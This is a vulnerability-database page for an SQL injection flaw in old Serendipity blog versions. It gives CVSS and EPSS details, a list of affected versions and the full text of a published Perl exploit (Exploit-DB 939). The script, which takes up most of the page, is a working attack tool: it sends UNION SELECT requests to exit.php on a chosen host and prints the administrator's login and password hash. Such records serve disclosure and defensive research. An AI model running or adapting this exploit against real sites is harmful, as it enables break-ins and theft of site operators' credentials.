Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 939
Publication date : 2005-04-12 22h00 +00:00
Author : kre0n
EDB Verified : Yes
#!/usr/bin/perl
# Serendipity 0.8beta4 exit.php SQL Injection exploit
# (c) ADZ Security Team 2004-2005
# (c) kreon 2005
# http://adz.void.ru/
#
[email protected]
# Public :)
print "\n\n";
print "# Serendipity 0.8beta4 exit.php SQL Injection exploit\n";
print "# (C) ADZ Security Team 2004-2005\n";
print "# (C) kreon 2005\n";
use IO::Socket;
use Getopt::Std;
getopt("h:d:p:t:");
$opt_p ||= 80;
$opt_d ||= "/";
$opt_t ||= "serendipity_";
if(!$opt_h) {
die("# Usage: $0 -h <host> [-d <dir>] [-p <port>] [-t table_prefix]\n");
}
$sqlpass = "?entry_id=1&url_id=1%20UNION%20SELECT%20password%20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*";
$sqllogin = "?entry_id=1&url_id=1%20UNION%20SELECT%20username%20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*";
print "# Host: $opt_h\n";
print "# Dir: $opt_d\n";
print "# Port: $opt_p\n";
print "# Prefix: $opt_t\n";
$Q1 = "GET ".$opt_d."/exit.php".$sqllogin." HTTP/1.0\n";
$Q1 .= "Host: ".$opt_h."\n\n";
$Q2 = "GET ".$opt_d."/exit.php".$sqlpass." HTTP/1.0\n";
$Q2 .= "Host: ".$opt_h."\n\n";
$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!");
$s->send($Q1);
$s->recv($txt, 1024);
if($txt =~ m/location: (\S+)/i) {
$login = $1;
}
$s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!");
$s->send($Q2);
$s->recv($txt, 1024);
if($txt =~ m/location: (\S+)/i) {
$pass = $1;
}
if(!$login || !$pass || $login =~ m/http:\/\//i || $pass =~ m/http:\/\//i) {
print "# Failed :(\n";
exit;
}
print "# Succeed :)\n";
print "# Login: $login\n";
print "# Pass Hash: $pass\n";
print "\n";
# milw0rm.com [2005-04-13]
Products Mentioned
Configuraton 0
S9y>>Serendipity >> Version 0.3
S9y>>Serendipity >> Version 0.4
S9y>>Serendipity >> Version 0.5
S9y>>Serendipity >> Version 0.5_pl1
S9y>>Serendipity >> Version 0.6
S9y>>Serendipity >> Version 0.6_pl1
S9y>>Serendipity >> Version 0.6_pl2
S9y>>Serendipity >> Version 0.6_pl3
S9y>>Serendipity >> Version 0.6_rc1
S9y>>Serendipity >> Version 0.6_rc2
S9y>>Serendipity >> Version 0.7
S9y>>Serendipity >> Version 0.7_beta1
S9y>>Serendipity >> Version 0.7_beta2
S9y>>Serendipity >> Version 0.7_beta3
S9y>>Serendipity >> Version 0.7_beta4
S9y>>Serendipity >> Version 0.7_rc1
S9y>>Serendipity >> Version 0.8_beta5
S9y>>Serendipity >> Version 0.8_beta6
References